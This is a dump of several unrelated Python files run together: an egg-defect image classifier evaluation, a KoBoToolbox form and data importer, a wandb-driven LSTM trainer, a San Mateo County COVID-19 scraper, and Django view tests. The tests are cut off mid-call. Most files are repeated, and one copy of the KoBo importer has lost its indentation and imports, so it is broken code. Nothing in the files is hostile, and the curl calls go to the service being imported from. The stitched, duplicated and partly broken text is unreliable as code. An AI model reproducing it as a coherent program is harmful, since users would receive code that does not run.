    if pred_label != label:
        cv2.imwrite(os.path.join(no_ok_dir, filename), image)
    print(f'File: (unknown), Label: {label_name}, Pred: {pred_label_name}')
    e = time.time()
    print(f'Processing time {round(e - s, 2)} (s)')
# Aggregate metrics over the whole test set.
pred_labels = np.array(pred_labels)
labels = np.array(labels)
bn_confusion_matrix =metrics.confusion_matrix(labels, pred_labels)
bn_report = metrics.classification_report(labels, pred_labels, target_names=bn_class_names, output_dict=True)
save_csv_report(bn_report, os.path.join(output_dir,f'BN_Report.csv'), bn_class_names)
save_csv_confusion_matrix(bn_confusion_matrix, os.path.join(output_dir,f'BN_CM.csv'), bn_class_names)
print(bn_confusion_matrix)
print(bn_report)
end = time.time()
total = end - start
print(f'{round(total / num_samples, 2)} (s), {round(num_samples / total, 2)} (fps)')
import requests
import os
import time
import cv2
import numpy as np
from scipy.special import softmax
from sklearn import metrics
import pandas as pd
def parse_labels(filenames):
    """Extract the ground-truth label from each filename.

    Delegates to parse_label so the filename-parsing rule lives in exactly
    one place (previously the slicing logic was duplicated in both helpers).
    """
    return [parse_label(filename) for filename in filenames]
def parse_label(filename):
    """Extract the ground-truth label embedded in *filename*.

    The stem (extension stripped, assuming a 3-character suffix) is
    underscore-separated; the label is the 4th field from the end with its
    first and last delimiter characters removed.
    """
    stem = filename[:-4]
    fields = stem.split('_')
    return fields[-4][1:-1]
def render_label(image, label, pred):
    """Overlay ground-truth and predicted labels on *image* and show it."""
    font = cv2.FONT_HERSHEY_SIMPLEX
    blue, green = (255, 0, 0), (0, 255, 0)
    image = cv2.putText(image, f'Label: {label}', (50, 100),
                        font, 1, blue, 2, cv2.LINE_AA)
    image = cv2.putText(image, f'Pred: {pred}', (50, 50),
                        font, 1, green, 2, cv2.LINE_AA)
    # Non-blocking preview window (1 ms key wait keeps the UI responsive).
    cv2.imshow('Classification Result', image)
    cv2.waitKey(1)
    return image
def save_csv_report(report, output_dir, class_names):
    """Write a sklearn classification-report dict to CSV at *output_dir*.

    Rows are the per-class entries followed by the three summary rows that
    ``classification_report(output_dict=True)`` appends.
    """
    frame = pd.DataFrame(report).transpose()
    row_names = class_names + ["accuracy", "macro avg", "weighted avg"]
    frame.insert(loc=0, column='class', value=row_names)
    frame.to_csv(output_dir, index=False, float_format='%.4f')
def save_csv_confusion_matrix(confusion_matrix, output_dir, class_names):
    """Write a confusion matrix to CSV with class names labelling both axes."""
    frame = pd.DataFrame(confusion_matrix, columns=class_names)
    # First column carries the row labels (blank header cell).
    frame.insert(loc=0, column=' ', value=class_names)
    frame.to_csv(output_dir, index=False)
# Inference-server endpoint that classifies a single uploaded photo.
api = 'http://10.8.0.94:5000/api/photos/'
# Full 7-way label mapping (index -> name), kept for reference.
class_label_to_name = {0: 'ok', 1: 'qishihuangdong', 2 : 'sipei', 3: 'kongliao', 4: 'wuqishi', 5: 'liewen', 6: 'ruopei'}
# Binary mapping: every defect class collapses to 1 (NoOK).
name_to_class_label = {'ok': 0 , 'qishihuangdong' : 1, 'sipei' : 1, 'kongliao' : 1, 'wuqishi' : 1, 'liewen' : 1, 'ruopei' : 1}
# name_to_class_label = {'ok': 0 , 'qishihuangdong' : 1, 'sipei' : 2, 'kongliao' : 3, 'wuqishi' : 4, 'liewen' : 5, 'ruopei' : 6}
test_file_path= '/Users/luvletteru/Documents/2022-02-13-Eggs-Test'
output_dir = '/Users/luvletteru/Documents/2022-02-16-Eggs-Test-Result'
result_dir = os.path.join(output_dir, 'results')
no_ok_dir = os.path.join(output_dir, 'no_ok')
bn_class_names = ['OK', 'NoOK']
os.makedirs(result_dir, exist_ok=True)
os.makedirs(no_ok_dir, exist_ok=True)
filenames = os.listdir(test_file_path)
num_samples = len(filenames)
label_names = []
labels = []
pred_label_names = []
pred_labels = []
start = time.time()
for idx, filename in enumerate(filenames):
    # Skip files whose name marks them as filtered out.
    if '--' in filename:
        print(f"Filter (unknown)")
        continue
    s = time.time()
    image_path = os.path.join(test_file_path, filename)
    image = cv2.imread(image_path)
    # Send classification request to the inference server.
    # BUG FIX: open the upload in a context manager so the file handle is
    # closed after each request instead of leaking one descriptor per image.
    with open(image_path, 'rb') as image_file:
        response = requests.post(api, files = {"file": image_file})
    # Obtain prediction result (a plain label-name string).
    pred_label_name = response.json()
    # Ground truth parsed from the filename.
    label_name = parse_label(filename)
    label = name_to_class_label[label_name]
    label_names.append(label_name)
    labels.append(label)
    pred_label_names.append(pred_label_name)
    pred_label = name_to_class_label[pred_label_name]
    pred_labels.append(pred_label)
    # Save the annotated image; misclassified ones also go to no_ok_dir.
    image = render_label(image, label_name, pred_label_name)
    cv2.imwrite(os.path.join(result_dir, filename), image)
    if pred_label != label:
        cv2.imwrite(os.path.join(no_ok_dir, filename), image)
    print(f'File: (unknown), Label: {label_name}, Pred: {pred_label_name}')
    e = time.time()
    print(f'Processing time {round(e - s, 2)} (s)')
# Aggregate metrics over the whole test set.
pred_labels = np.array(pred_labels)
labels = np.array(labels)
bn_confusion_matrix =metrics.confusion_matrix(labels, pred_labels)
bn_report = metrics.classification_report(labels, pred_labels, target_names=bn_class_names, output_dict=True)
save_csv_report(bn_report, os.path.join(output_dir,f'BN_Report.csv'), bn_class_names)
save_csv_confusion_matrix(bn_confusion_matrix, os.path.join(output_dir,f'BN_CM.csv'), bn_class_names)
print(bn_confusion_matrix)
print(bn_report)
end = time.time()
total = end - start
print(f'{round(total / num_samples, 2)} (s), {round(num_samples / total, 2)} (fps)')
import tempfile, shutil, sys, subprocess, json
import populate_xmeta as px
def kobo_import(kobo_username, auth_token):
    """Import every form definition and all submission data for a KoBo user."""
    kobo_url = "https://kc.kobotoolbox.org/%s" % (kobo_username,)
    kobo_import_forms(kobo_url, auth_token)
    kobo_import_data(auth_token)
def kobo_import_forms(kobo_url, auth_token):
    """Download every form definition (XLS and JSON) from KoBoToolbox and
    persist each through populate_xmeta.

    NOTE(review): the auth token is interpolated into a curl command line,
    which makes it visible to other local users via the process list;
    consider a Python HTTP client instead.
    """
    # List all forms visible to this token.
    forms = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms", "-H", "Authorization: Token %s" % (auth_token)]))
    for form in forms:
        formid = form['formid']
        # Raw XLSForm spreadsheet (bytes, stored as-is).
        xlsform = subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms/%s/form.xls" % (formid), "-H", "Authorization: Token %s" % (auth_token)])
        # JSON XForm definition; id_string/version identify the form.
        xform = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms/%s/form.json" % (formid), "-H", "Authorization: Token %s" % (auth_token)]))
        fid = xform['id_string']
        vid = xform['version']
        path = formid
        # Canonical re-serialization (sorted keys, pretty-printed) for storage.
        xform = json.dumps(xform, sort_keys=True,indent=4, separators=(',', ': '))
        px.populate_xmeta_kobo(fid,vid,kobo_url,path,xlsform,xform)
def kobo_import_data(auth_token):
    """Download every submission for every form and persist each through
    populate_xmeta.

    NOTE(review): the auth token is passed on the curl command line and is
    visible in the process list — same caveat as kobo_import_forms.
    """
    forms = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms", "-H", "Authorization: Token %s" % (auth_token)]))
    for form in forms:
        formid = form['formid']
        # All submissions recorded for this form.
        submissions = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/data/%s" % (formid), "-H", "Authorization: Token %s" % (auth_token)]))
        for xdata in submissions:
            sid = str(xdata['_id'])
            fid = xdata['_xform_id_string']
            vid = xdata['__version__']
            # Device metadata is not available via this API; use a marker value.
            device_id = "kobo"
            device_ip = "kobo"
            device_type = "kobo"
            # Canonical re-serialization (sorted keys, pretty-printed) for storage.
            xdata = json.dumps(xdata, sort_keys=True,indent=4, separators=(',', ': '))
            px.populate_xdata_kobo(sid,fid,vid,device_id,device_ip,device_type,xdata)
if __name__ == '__main__':
    # CLI entry point: kobo_import.py <kobo-username> <auth-token>
    if len(sys.argv) == 3:
        kobo_import(sys.argv[1],sys.argv[2])
    else:
        # BUG FIX: usage errors belong on stderr and should exit non-zero so
        # calling scripts can detect the failure.
        print("Usage: %s kobo username, kobo authorization token" % sys.argv[0], file=sys.stderr)
        sys.exit(1)
import populate_xmeta as px
def kobo_import(kobo_username, auth_token):
kobo_url = "https://kc.kobotoolbox.org/%s" % (kobo_username)
kobo_import_forms(kobo_url, auth_token)
kobo_import_data(auth_token)
def kobo_import_forms(kobo_url, auth_token):
    """Download every form definition (XLS and JSON) from KoBoToolbox and
    persist each through populate_xmeta.

    NOTE(review): the auth token is interpolated into a curl command line,
    which makes it visible to other local users via the process list;
    consider a Python HTTP client instead.
    """
    # List all forms visible to this token.
    forms = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms", "-H", "Authorization: Token %s" % (auth_token)]))
    for form in forms:
        formid = form['formid']
        # Raw XLSForm spreadsheet (bytes, stored as-is).
        xlsform = subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms/%s/form.xls" % (formid), "-H", "Authorization: Token %s" % (auth_token)])
        # JSON XForm definition; id_string/version identify the form.
        xform = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms/%s/form.json" % (formid), "-H", "Authorization: Token %s" % (auth_token)]))
        fid = xform['id_string']
        vid = xform['version']
        path = formid
        # Canonical re-serialization (sorted keys, pretty-printed) for storage.
        xform = json.dumps(xform, sort_keys=True,indent=4, separators=(',', ': '))
        px.populate_xmeta_kobo(fid,vid,kobo_url,path,xlsform,xform)
def kobo_import_data(auth_token):
    """Download every submission for every form and persist each through
    populate_xmeta.

    NOTE(review): the auth token is passed on the curl command line and is
    visible in the process list — same caveat as kobo_import_forms.
    """
    forms = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms", "-H", "Authorization: Token %s" % (auth_token)]))
    for form in forms:
        formid = form['formid']
        # All submissions recorded for this form.
        submissions = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/data/%s" % (formid), "-H", "Authorization: Token %s" % (auth_token)]))
        for xdata in submissions:
            sid = str(xdata['_id'])
            fid = xdata['_xform_id_string']
            vid = xdata['__version__']
            # Device metadata is not available via this API; use a marker value.
            device_id = "kobo"
            device_ip = "kobo"
            device_type = "kobo"
            # Canonical re-serialization (sorted keys, pretty-printed) for storage.
            xdata = json.dumps(xdata, sort_keys=True,indent=4, separators=(',', ': '))
            px.populate_xdata_kobo(sid,fid,vid,device_id,device_ip,device_type,xdata)
if __name__ == '__main__':
    # CLI entry point: kobo_import.py <kobo-username> <auth-token>
    if len(sys.argv) == 3:
        kobo_import(sys.argv[1],sys.argv[2])
    else:
        # BUG FIX: usage errors belong on stderr and should exit non-zero so
        # calling scripts can detect the failure.
        print("Usage: %s kobo username, kobo authorization token" % sys.argv[0], file=sys.stderr)
        sys.exit(1)
import os
import warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = "2"
import tensorflow as tf
import wandb
from wandb.keras import WandbCallback
import sklearn
import numpy as np
from sklearn.metrics import confusion_matrix
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.preprocessing import sequence
from tensorflow.keras import layers, models
from tensorflow.keras.models import Sequential
from tensorflow.keras import layers
from tensorflow.keras import optimizers
from tensorflow.keras.layers import SimpleRNN, Dense
from tensorflow.keras.layers import Bidirectional
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import InteractiveSession
from matplotlib import pyplot
from data_repository import DataRepository
import sys
import tensorflow.keras as K
np.set_printoptions(threshold=sys.maxsize)
# Ignore future warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
# wandb sweep agent supplies the hyperparameters through wandb.config.
wandb.init()
# Root CSV files directory
dirname = wandb.config.path
# Load data splits; record their sizes on the run config.
repo = DataRepository(dirname)
x_train, x_val, x_test, y_train, y_val, y_test, labels = repo.getForTraining()
num_classes = repo.numClasses
wandb.config.update({'Size_Training_Set': len(x_train),'Size_Validation_Set': len(x_val), 'Size_Test_Set': len(x_test)})
# Class names are the (case-insensitively sorted) entries of the data dir.
tokens = os.listdir(dirname)
tokens = sorted(tokens, key=str.casefold)
token_labels = {i:tokens[i] for i in range(0, len(tokens))}
# GPU initialization: cap per-process memory at 30% and grow on demand.
physical_devices = tf.config.list_physical_devices('GPU')
print("Num GPUs:", len(physical_devices))
config = ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.3
config.gpu_options.allow_growth = True
session = InteractiveSession(config=config)
# Model: stacked bidirectional LSTMs with dropout, sized by the sweep config.
dropout = wandb.config.dropout
# NOTE(review): only 3 hidden sizes are configured, so num_layers must be
# <= 3 or the indexing below raises IndexError.
nodesizes = [wandb.config.node_size2, wandb.config.node_size3, wandb.config.node_size4]
model = Sequential()
model.add(Bidirectional(layers.LSTM(wandb.config.node_size1, return_sequences=True), input_shape=(x_train.shape[1], x_train.shape[2])))
model.add(layers.Dropout(rate=dropout))
for i in range(0,wandb.config.num_layers): # number of hidden layers chosen by the sweep (1..3)
    model.add(Bidirectional(layers.LSTM(nodesizes[i],return_sequences=True)))
    model.add(layers.Dropout(rate=dropout))
model.add(Bidirectional(layers.LSTM(wandb.config.node_size5)))
model.add(layers.Dropout(rate=dropout))
model.add(layers.Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
    optimizer=wandb.config.optimizer,
    metrics=['accuracy',tf.keras.metrics.Precision(),tf.keras.metrics.Recall()])
model.summary()
wandb.config.optimizer_config = model.optimizer.get_config()
history=model.fit(x_train,y_train,
    epochs=wandb.config.epochs,
    batch_size=wandb.config.batch_size,
    validation_data=(x_val,y_val),
    shuffle=False,
    verbose=2,
    callbacks=[WandbCallback()])
model_best_path = os.path.join(wandb.run.dir, "model-best.h5")
# Evaluate the best checkpoint saved by WandbCallback on the held-out test set.
best_model= tf.keras.models.load_model(filepath=model_best_path)
y_eval = best_model.evaluate(x_test, y_test, verbose=2)
wandb.config.update({'test_loss': y_eval[0],'test_accuracy': y_eval[1], 'test_precision': y_eval[2], 'test_recall': y_eval[3]})
# Confusion matrix logged to wandb with human-readable class names.
y_pred = best_model.predict(x_test)
y_pred_integer = np.argmax(y_pred, axis=1)
y_test_integer = np.argmax(y_test, axis=1)
y_pred_name = ([token_labels[p] for p in y_pred_integer])
y_test_name = ([token_labels[p] for p in y_test_integer])
wandb.sklearn.plot_confusion_matrix(y_test_name, y_pred_name)
# Convert the best model to TFLite and keep that artifact instead of the .h5.
tflite_converter = tf.lite.TFLiteConverter.from_keras_model(best_model)
# Needed for some ops.
tflite_converter.experimental_new_converter = True
# tflite_converter.allow_custom_ops = True
tflite_model = tflite_converter.convert()
# BUG FIX: write through a context manager so the file handle is closed
# (the original open(...).write(...) leaked it).
with open(os.path.join(wandb.run.dir, "model-best.tflite"), "wb") as tflite_file:
    tflite_file.write(tflite_model)
os.remove(model_best_path)
import warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = "2"
import tensorflow as tf
import wandb
from wandb.keras import WandbCallback
import sklearn
import numpy as np
from sklearn.metrics import confusion_matrix
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.preprocessing import sequence
from tensorflow.keras import layers, models
from tensorflow.keras.models import Sequential
from tensorflow.keras import layers
from tensorflow.keras import optimizers
from tensorflow.keras.layers import SimpleRNN, Dense
from tensorflow.keras.layers import Bidirectional
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import InteractiveSession
from matplotlib import pyplot
from data_repository import DataRepository
import sys
import tensorflow.keras as K
np.set_printoptions(threshold=sys.maxsize)
# Ignore future warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
# wandb sweep agent supplies the hyperparameters through wandb.config.
wandb.init()
# Root CSV files directory
dirname = wandb.config.path
# Load data splits; record their sizes on the run config.
repo = DataRepository(dirname)
x_train, x_val, x_test, y_train, y_val, y_test, labels = repo.getForTraining()
num_classes = repo.numClasses
wandb.config.update({'Size_Training_Set': len(x_train),'Size_Validation_Set': len(x_val), 'Size_Test_Set': len(x_test)})
# Class names are the (case-insensitively sorted) entries of the data dir.
tokens = os.listdir(dirname)
tokens = sorted(tokens, key=str.casefold)
token_labels = {i:tokens[i] for i in range(0, len(tokens))}
# GPU initialization: cap per-process memory at 30% and grow on demand.
physical_devices = tf.config.list_physical_devices('GPU')
print("Num GPUs:", len(physical_devices))
config = ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.3
config.gpu_options.allow_growth = True
session = InteractiveSession(config=config)
# Model: stacked bidirectional LSTMs with dropout, sized by the sweep config.
dropout = wandb.config.dropout
# NOTE(review): only 3 hidden sizes are configured, so num_layers must be
# <= 3 or the indexing below raises IndexError.
nodesizes = [wandb.config.node_size2, wandb.config.node_size3, wandb.config.node_size4]
model = Sequential()
model.add(Bidirectional(layers.LSTM(wandb.config.node_size1, return_sequences=True), input_shape=(x_train.shape[1], x_train.shape[2])))
model.add(layers.Dropout(rate=dropout))
for i in range(0,wandb.config.num_layers): # number of hidden layers chosen by the sweep (1..3)
    model.add(Bidirectional(layers.LSTM(nodesizes[i],return_sequences=True)))
    model.add(layers.Dropout(rate=dropout))
model.add(Bidirectional(layers.LSTM(wandb.config.node_size5)))
model.add(layers.Dropout(rate=dropout))
model.add(layers.Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
    optimizer=wandb.config.optimizer,
    metrics=['accuracy',tf.keras.metrics.Precision(),tf.keras.metrics.Recall()])
model.summary()
wandb.config.optimizer_config = model.optimizer.get_config()
history=model.fit(x_train,y_train,
    epochs=wandb.config.epochs,
    batch_size=wandb.config.batch_size,
    validation_data=(x_val,y_val),
    shuffle=False,
    verbose=2,
    callbacks=[WandbCallback()])
model_best_path = os.path.join(wandb.run.dir, "model-best.h5")
# Evaluate the best checkpoint saved by WandbCallback on the held-out test set.
best_model= tf.keras.models.load_model(filepath=model_best_path)
y_eval = best_model.evaluate(x_test, y_test, verbose=2)
wandb.config.update({'test_loss': y_eval[0],'test_accuracy': y_eval[1], 'test_precision': y_eval[2], 'test_recall': y_eval[3]})
# Confusion matrix logged to wandb with human-readable class names.
y_pred = best_model.predict(x_test)
y_pred_integer = np.argmax(y_pred, axis=1)
y_test_integer = np.argmax(y_test, axis=1)
y_pred_name = ([token_labels[p] for p in y_pred_integer])
y_test_name = ([token_labels[p] for p in y_test_integer])
wandb.sklearn.plot_confusion_matrix(y_test_name, y_pred_name)
# Convert the best model to TFLite and keep that artifact instead of the .h5.
tflite_converter = tf.lite.TFLiteConverter.from_keras_model(best_model)
# Needed for some ops.
tflite_converter.experimental_new_converter = True
# tflite_converter.allow_custom_ops = True
tflite_model = tflite_converter.convert()
# BUG FIX: write through a context manager so the file handle is closed
# (the original open(...).write(...) leaked it).
with open(os.path.join(wandb.run.dir, "model-best.tflite"), "wb") as tflite_file:
    tflite_file.write(tflite_model)
os.remove(model_best_path)
import json
from datetime import datetime
from typing import Any, Dict, List, cast
from covid19_sfbayarea.utils import dig, parse_datetime
from .cases_by_age import CasesByAge
from .cases_by_ethnicity import CasesByEthnicity
from .cases_by_gender import CasesByGender
from .meta import Meta
from .deaths_by_age import DeathsByAge
from .deaths_by_ethnicity import DeathsByEthnicity
from .deaths_by_gender import DeathsByGender
from .time_series_cases import TimeSeriesCases
from .time_series_tests import TimeSeriesTests
from .total_deaths import TotalDeaths
from ..utils import get_data_model
LANDING_PAGE = 'https://www.smchealth.org/post/san-mateo-county-covid-19-data-1'
def get_county() -> Dict:
    """Return the shared county data-model skeleton filled with San Mateo data."""
    county = get_data_model()
    county.update(fetch_data())
    return county
def fetch_data() -> Dict:
    """Scrape all San Mateo County datasets and assemble the county dict.

    Pulls timeseries, case totals and death totals from the per-dataset
    scrapers, then derives the update timestamp and a one-entry
    cumulative-deaths "timeseries" (the county publishes none).
    """
    data : Dict = {
        'name': 'San Mateo County',
        'source_url': LANDING_PAGE,
        'meta_from_source': Meta().get_data(),
        'meta_from_baypd': """
See power_bi_scraper.py for methods.
San Mateo does not provide a timestamp for their last dataset update,
so BayPD uses midnight of the latest day in the cases timeseries as a proxy.
San Mateo does not provide a deaths timeseries. In lieu of a
timeseries BayPD provides cumulative deaths for the date of the last
dataset update.
""",
        'series': {
            'cases': TimeSeriesCases().get_data(),
            'tests': TimeSeriesTests().get_data()
        },
        'case_totals': {
            'gender': CasesByGender().get_data(),
            'age_group': CasesByAge().get_data(),
            'race_eth': CasesByEthnicity().get_data()
        },
        'death_totals': {
            'gender': DeathsByGender().get_data(),
            'age_group': DeathsByAge().get_data(),
            'race_eth': DeathsByEthnicity().get_data()
        }
    }
    # Proxy timestamp: midnight of the latest day in the cases timeseries.
    last_updated = most_recent_case_time(data)
    data.update({ 'update_time': last_updated.isoformat() })
    # Single-entry deaths "series" stamped with the same proxy date.
    data['series'].update({ 'deaths': cumulative_deaths(last_updated) })
    return data
def most_recent_case_time(data: Dict[str, Any]) -> datetime:
    """Parse the date of the last entry in the cases timeseries."""
    latest = cast(Dict[str, str], dig(data, ['series', 'cases', -1]))
    return parse_datetime(latest['date'])
def cumulative_deaths(last_updated: datetime) -> List[Dict[str, Any]]:
    """Build a single-entry deaths "timeseries" dated *last_updated*.

    The county publishes no deaths timeseries, so the daily count is the
    sentinel -1 and only the cumulative total is meaningful.
    """
    entry = {
        'date': last_updated.strftime('%Y-%m-%d'),
        'deaths': -1,
        'cumul_deaths': TotalDeaths().get_data()
    }
    return [entry]
if __name__ == '__main__':
    # When run as a script, dump the county data as pretty-printed JSON.
    print(json.dumps(get_county(), indent=4))
from datetime import datetime
from typing import Any, Dict, List, cast
from covid19_sfbayarea.utils import dig, parse_datetime
from .cases_by_age import CasesByAge
from .cases_by_ethnicity import CasesByEthnicity
from .cases_by_gender import CasesByGender
from .meta import Meta
from .deaths_by_age import DeathsByAge
from .deaths_by_ethnicity import DeathsByEthnicity
from .deaths_by_gender import DeathsByGender
from .time_series_cases import TimeSeriesCases
from .time_series_tests import TimeSeriesTests
from .total_deaths import TotalDeaths
from ..utils import get_data_model
LANDING_PAGE = 'https://www.smchealth.org/post/san-mateo-county-covid-19-data-1'
def get_county() -> Dict:
    """Return the shared county data-model skeleton filled with San Mateo data."""
    county = get_data_model()
    county.update(fetch_data())
    return county
def fetch_data() -> Dict:
    """Scrape all San Mateo County datasets and assemble the county dict.

    Pulls timeseries, case totals and death totals from the per-dataset
    scrapers, then derives the update timestamp and a one-entry
    cumulative-deaths "timeseries" (the county publishes none).
    """
    data : Dict = {
        'name': 'San Mateo County',
        'source_url': LANDING_PAGE,
        'meta_from_source': Meta().get_data(),
        'meta_from_baypd': """
See power_bi_scraper.py for methods.
San Mateo does not provide a timestamp for their last dataset update,
so BayPD uses midnight of the latest day in the cases timeseries as a proxy.
San Mateo does not provide a deaths timeseries. In lieu of a
timeseries BayPD provides cumulative deaths for the date of the last
dataset update.
""",
        'series': {
            'cases': TimeSeriesCases().get_data(),
            'tests': TimeSeriesTests().get_data()
        },
        'case_totals': {
            'gender': CasesByGender().get_data(),
            'age_group': CasesByAge().get_data(),
            'race_eth': CasesByEthnicity().get_data()
        },
        'death_totals': {
            'gender': DeathsByGender().get_data(),
            'age_group': DeathsByAge().get_data(),
            'race_eth': DeathsByEthnicity().get_data()
        }
    }
    # Proxy timestamp: midnight of the latest day in the cases timeseries.
    last_updated = most_recent_case_time(data)
    data.update({ 'update_time': last_updated.isoformat() })
    # Single-entry deaths "series" stamped with the same proxy date.
    data['series'].update({ 'deaths': cumulative_deaths(last_updated) })
    return data
def most_recent_case_time(data: Dict[str, Any]) -> datetime:
    """Parse the date of the last entry in the cases timeseries."""
    latest = cast(Dict[str, str], dig(data, ['series', 'cases', -1]))
    return parse_datetime(latest['date'])
def cumulative_deaths(last_updated: datetime) -> List[Dict[str, Any]]:
    """Build a single-entry deaths "timeseries" dated *last_updated*.

    The county publishes no deaths timeseries, so the daily count is the
    sentinel -1 and only the cumulative total is meaningful.
    """
    entry = {
        'date': last_updated.strftime('%Y-%m-%d'),
        'deaths': -1,
        'cumul_deaths': TotalDeaths().get_data()
    }
    return [entry]
if __name__ == '__main__':
    # When run as a script, dump the county data as pretty-printed JSON.
    print(json.dumps(get_county(), indent=4))
from unittest import mock
from django.test import TestCase
from django.urls import reverse
from dominio.tests.testconf import NoJWTTestCase, NoCacheTestCase
class TestPIPIndicadoresSucesso(NoJWTTestCase, NoCacheTestCase, TestCase):
    """Tests for the pip-indicadores-sucesso endpoint."""

    @mock.patch("dominio.pip.views.PIPIndicadoresDeSucessoDAO.execute")
    def test_correct_response(self, _execute):
        """DAO row tuples are serialized into a list of dicts by the view."""
        _execute.return_value = [
            ("12345", 0.344, "p_finalizacoes"),
            ("12345", 0.123, "p_resolutividade"),
            ("12345", 0.983, "p_eludcidacoes"),
        ]
        orgao_id = "12345"
        url = reverse("dominio:pip-indicadores-sucesso", args=(orgao_id,))
        resp = self.client.get(url)
        # Note the orgao_id string is serialized as an int in the response.
        expected = [
            {"orgao_id": 12345, "indice": 0.344, "tipo": "p_finalizacoes"},
            {"orgao_id": 12345, "indice": 0.123, "tipo": "p_resolutividade"},
            {"orgao_id": 12345, "indice": 0.983, "tipo": "p_eludcidacoes"},
        ]
        assert resp.status_code == 200
        assert resp.data == expected
class TestPIPRadarPerformance(NoJWTTestCase, NoCacheTestCase, TestCase):
    """Tests for the pip-radar-performance endpoint."""

    @mock.patch("dominio.pip.views.PIPRadarPerformanceDAO.get")
    def test_correct_response(self, _get_data):
        """The view passes the DAO payload through unchanged."""
        _get_data.return_value = {"data": 1}
        url = reverse("dominio:pip-radar-performance", args=("12345",))
        resp = self.client.get(url)
        assert resp.status_code == 200
        assert resp.data == {"data": 1}
class TestPIPPrincipaisInvestigadosView(
        NoJWTTestCase, NoCacheTestCase, TestCase):
    """Tests for the pip-principais-investigados list/flag endpoint."""

    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO.get")
    def test_correct_response_get(self, _get_data):
        """GET returns the DAO rows wrapped with a page count."""
        _get_data.return_value = [{"data": 1}]
        url = reverse(
            "dominio:pip-principais-investigados",
            args=("1234", "123")
        )
        resp = self.client.get(url)
        expected_response = {
            'investigados': [{"data": 1}], 'nr_paginas': 1
        }
        _get_data.assert_called_once_with(orgao_id="1234", cpf="123")
        assert resp.status_code == 200
        assert resp.data == expected_response

    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO.get")
    def test_correct_response_get_search(self, _get_data):
        """search_string filters the DAO rows by investigated name."""
        _get_data.return_value = [
            {"nm_investigado": "nome1"},
            {"nm_investigado": "nome2"}
        ]
        url = reverse(
            "dominio:pip-principais-investigados",
            args=("1234", "123")
        )
        data = {"search_string": "nome2"}
        resp = self.client.get(url, data)
        expected_response = {
            'investigados': [{"nm_investigado": "nome2"}],
            'nr_paginas': 1
        }
        _get_data.assert_called_once_with(orgao_id="1234", cpf="123")
        assert resp.status_code == 200
        assert resp.data == expected_response

    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO."
                "save_hbase_flags")
    def test_correct_response_save_flags(self, _save_flags):
        """POST with both fields persists the flag and echoes the result."""
        _save_flags.return_value = {"data": 1}
        url = reverse(
            "dominio:pip-principais-investigados",
            args=("1234", "123")
        )
        data = {"representante_dk": "123456", "action": "qualquer"}
        resp = self.client.post(url, data)
        _save_flags.assert_called_once_with(
            "1234", "123", "123456", "qualquer"
        )
        assert resp.status_code == 200
        assert resp.data == {"data": 1}

    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO."
                "save_hbase_flags")
    def test_no_personagem_save_flags(self, _save_flags):
        """POST without representante_dk raises and must not persist."""
        _save_flags.return_value = {"data": 1}
        url = reverse(
            "dominio:pip-principais-investigados",
            args=("1234", "123")
        )
        data = {"action": "qualquer"}
        # BUG FIX: the original asserted resp.status_code after this block,
        # but when the expected ValueError fires resp is never bound, so
        # that assertion raised NameError instead of testing anything.
        with self.assertRaises(ValueError):
            self.client.post(url, data)
        _save_flags.assert_not_called()

    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO."
                "save_hbase_flags")
    def test_no_action_save_flags(self, _save_flags):
        """POST without action raises and must not persist."""
        _save_flags.return_value = {"data": 1}
        url = reverse(
            "dominio:pip-principais-investigados",
            args=("1234", "123")
        )
        data = {"representante_dk": "123456"}
        # Same fix as above: no status assertion on an unbound response.
        with self.assertRaises(ValueError):
            self.client.post(url, data)
        _save_flags.assert_not_called()
class TestPIPPrincipaisInvestigadosListaView(
        NoJWTTestCase, NoCacheTestCase, TestCase):
    """Tests for the pip-principais-investigados-lista endpoint."""

    @mock.patch("dominio.pip.views."
                "PIPPrincipaisInvestigadosPerfilDAO.get_header_info")
    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosPerfilDAO.get")
    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosListaDAO.get")
    def test_correct_response(self, _get_procedimentos, _get_perfil, _header):
        """Response combines profile header, similar profiles and procedures.

        The view is expected to call the DAOs with dk=12345, digit=5 and a
        default pess_dk of 0 (no pessoa filter supplied).
        """
        _get_perfil.return_value = [{"data": 1}]
        _header.return_value = {"data": 1}
        _get_procedimentos.return_value = [{"data": 1}, {"data": 2}]
        expected_output = {
            "perfil": {"data": 1},
            "similares": [{"data": 1}],
            "procedimentos": [{"data": 1}, {"data": 2}]
        }
        url = reverse(
            "dominio:pip-principais-investigados-lista",
            args=("12345",)
        )
        resp = self.client.get(url)
        _get_perfil.assert_called_once_with(dk=12345, digit=5)
        _get_procedimentos.assert_called_once_with(
